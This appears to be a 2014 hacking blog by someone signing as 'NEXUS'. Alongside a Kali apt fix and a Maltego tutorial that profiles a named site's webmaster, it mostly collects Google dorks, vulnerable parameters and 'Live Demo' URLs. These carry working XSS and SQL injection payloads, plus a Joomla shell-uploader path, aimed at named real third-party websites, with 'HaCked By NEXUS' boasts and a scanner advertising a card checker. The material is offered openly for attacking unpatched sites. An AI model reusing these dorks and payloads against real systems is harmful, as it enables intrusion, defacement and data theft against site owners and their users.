Friday, 25 July 2014

[PHP] Metasploit Pro (Trial) License Grabber




[Kali Linux] How to Fix "Unable to locate package"








Do you ever experience something like this you are about to install something?


E: Unable to locate package...

Here is the solution, download the source.list below and place it in the /etc/apt/ . Replace the old one with the one that you have downloaded.


Permission Denied?
If you cannot copy and paste the source.list to the specific directory even though as root, you need to type in the terminal 

Code:
sudo nautilus

You will be prompted to enter your password. Enter your password and try again copy and paste the file into the directory.

What's next?
After done replacing the source.list, open your terminal and type these command.

Code:
sudo apt-get update
Code:
sudo apt-get -f install


After you have done all of these steps, you now can enjoy installing.

Thursday, 24 July 2014

[Kali Linux] Maltego - Infrastructure Information Gathering








In this tutorial, i'm going to show you how to gather information using Maltego in Kali Linux.

Firstly, open up Maltego.


Applications>Kali Linux>Top 10 Security Tools>Maltego





If this is your first time using it, you need to complete the registration. Once the registration complete. Click on the menu button and select new.




A blank screen will appear. Later, click on pallete. In this tutorial i'm going to show how to gather information from infrastructure. So, click infrastructure, drag and drop "Domain" into your project.




You will see a earth icon with a domain name. Double click on it and change the domain name to your target. In this tutorial, my target is www.papagomo.com




Close that window and let's start gathering information. Right click on the earth icon, choose Run Transform and then All transform , followed by your choice. In this case, i will use  To phone number [using search engine].




If the result was found, it will produce output like this picture.If nothing appear, that mean not result found.




There are 4 phone numbers, but it doesn't mean all of them belongs to the webmaster, but you can make a try. Now i'm going to use the phone number to get more information. So i will use the phone number to transform it into url. 




After i transform it into URL using search engine, i got a Facebook page. Maybe it's belong to the phone number owner and the webmaster.





I think that's all for now. I hope you understand how to use Maltego. 

Saturday, 12 July 2014

[SQLi-DB] SQLi Dork Scanner





SQLi-DB is a SQL Injection dork scanner. This scanner was coded in C# by RieqyNS13 from Indonesia. And it was recoded and rearrange by K3RAMA7. He make this based on the theme of the famous Defacement Mirror, HACK-DB.

Features:
-Multiple Search Engine
-Auto-Rotate Proxy
-Deep Scan
-CC Checker


To use this, it is very easy, simply paste your SQLi dork in the search column and click on the search icon.And you will see the scanning result.




Sunday, 6 July 2014

[XSS] noname-media

Dork:
intext:"powered by www.noname-media.com" inurl:"/view.php?id="

Exploit:
/view.php?id=

Live Demo:
http://www.rws-e.de/php/galerie/view.php?id=4&next=1&categorie=3%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring

ProActive CMS - XSS

Dork:
intext:"Powered by Proactive CMS"

Exploit:
 /admin.php?action=newuser (XSS)

Live Demo:
http://www.proactivecms.com/admin.php?action=newuser%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring

Joomla Collector Shell Uploader

Dork:
inurl:index.php?option=com_collector

Exploit:
 /index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

Live Demo:
http://www.volontarimini.it/volontarimini2012/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

 NEXUS - Sharing Is Caring

Joomla Aclassif - XSS

Dork:
inurl:"index.php?option=com_aclassif"

Exploit:
/index.php/component/aclassif/?

Example & Live Demo:
http://www.thegreekstar.com/index.php/component/aclassif/?%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,78,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

 NEXUS - Sharing Is Caring

Friday, 4 July 2014

Seventeen Design XSS & SQLI

Dork:
intext:"Producido por: Seventeen Design."

Exploits:
http://site.com/*.*id= <SQLI>
http://site.com/*.*id= <XSS>

Live Demo:

SQLI + XSS:
http://www.murcian.com/aig/nota.php?id=9%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,69,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E


NEXUS - Sharing Is Caring

Espacio Ecuador XSS & SQLI

Dork:
intext:"developed by Espacio Ecuador"

Exploits:
http://site.com/*.*?id= <SQLI>
http://site.com/*.*?id= < XSS>

Live Demo:

SQLI:
http://www.galapagostraveline.com/deal.html?opc=31%27

XSS:
http://www.galapagostraveline.com/deal.html?opc=31%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E


NEXUS - Sharing Is Caring

WordPress zarzadzanie_kontem Plugin

Dork:
inurl:"/wp-content/plugins/zarzadzanie_kontem/"



Live Demo:
http://kursrekodziela.pl/images/user-images/front-end/guest/2014/07/NEXUS.txt

NEXUS - Sharing Is Caring

Arwen Cross Site Scripting & SQL Injection

Dork:
intext:"website realizado por Arwen desarrollo web y dise&#241;o"

Exploits:
http://site.com/index.php?m= <SQLI>
 http://site.com/index.php?mod= < SQLI>
 http://site.com/index.php?m= <XSS>
 http://site.com/index.php?mod= <XSS>

Live Demo: 

SQLI:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%27

XSS:
http://www.raulmadinabeitia.com/grupos.php?mod=61&id=97%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

NEXUS - Sharing Is Caring

MD Webmarketing Cross Site Scripting / SQL Injection

Dork:
"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id=

Exploits:
http://www.site-web.com/***.php?id= [SQL Injection]
http://www.site-web.com/***.php?id=**********&busca= [Cross Site Scripting]

Live Demo:

SQL Injection:
http://www.pierreadrileiloes.com.br/exibe.php?id=61712%27



XSS (with HTML scripts):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Ch1%3EHaCked%20By%20NEXUS%20!%3C/h1%3E


XSS (with JavaScript):
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://www.edinhoneves.com/exibe.php?id=231&cod_editorial=1&url=index.php&pag=0&busca=%22%3E%3Cimg%20src=x%20onerror=alert%28%22NEXUS%22%29;%3E 


NEXUS - Sharing Is Caring

Thursday, 3 July 2014

milkshakedesign CMS - XSS Vulnerability

Dork:
intext:"Website by Milkshake Design" inurl:"/programmeview.php?pid="

Exploit:
 programmeview.php?pid=

Example & Live Demo:
http://www.optimumtelevision.com/programmeview.php?pid=310%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29%3C/script%3E
NEXUS 

XSS Found By NEXUS !

I found all XSS in those sites :D
http://pastebin.com/fGSr5sn3
NEXUS 

mc-creation CMS - XSS Vulnerability

Dorks:
intext:"web design solution" inurl:"product_view.php?pid="
intext:"web design solution"

Exploit:
"product_view.php?pid="

Examples & Live Demos:

Testing:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E

String to char:
http://www.toupretpro.co.uk/products/product_view.php?pid=10%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E



NEXUS

Morgane CMS - XSS Vulnerability

Dorks:
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id=" 

 Use string to char.. Or use numbers..

Example & Live Demo:

String to char mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E

Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
 http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
* Can run XSS only on Firefox not Google Chrome :D



NEXUS 

Tuesday, 1 July 2014

Kingcow CMS Cross Site Scripting

Dorks:
inurl:"search.php?for="
intext:"Powered by Central" 
* for parameter in search.php is VULNERABLE to XSS..

Exploits:
"><script>alert('HaCked_By_NEXUS');</script>&search_submit=Search
Or if you can't use normal script.. Change it from string to character: 
"><script>alert(String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33));</script>&search_submit=Search
 These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...



If you dont have that "Hack Bar" .. Download it from :
https://addons.mozilla.org/en-US/firefox/addon/hackbar/
Live Demo:
http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search
http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search
NEXUS 

Cm3 CMS Cross Site Scripting (XSS)

Dork:
intext:"Powered by cm3"
* Keywords & strSearchPhrase Parametrs In Search.asp Are Vulnerable to XSS..

Exploits:
http://www.NEXUS.com/forums/search.asp?strSearchPhrase="><script>alert(0);</script>&amp;ContainerID=&forumsearchoption=topics
http://www.NEXUS,com/search.asp?keywords="><script>alert(0);</script>&SearchType=And&;CurrentPage=1
http://www.NEXUS.com/search.asp?CurrentPage=1&sitekeywords"><script>alert(0);</script>&;SearchType=Default 
http://www.NEXUS.com/search.asp?SearchType=Keywords&Keywords="><script>alert(0);</script>&amp;x=0&y=0 
Live Demo:
http://www.ergonomics.org.au/forums/search.asp?strSearchPhrase=%22%3E%3Cscript%3Ealert%28%22HaCked%20By%20NEXUS%20!%22%29;%3C/script%3E&amp;ContainerID=&forumsearchoption=topics 

NEXUS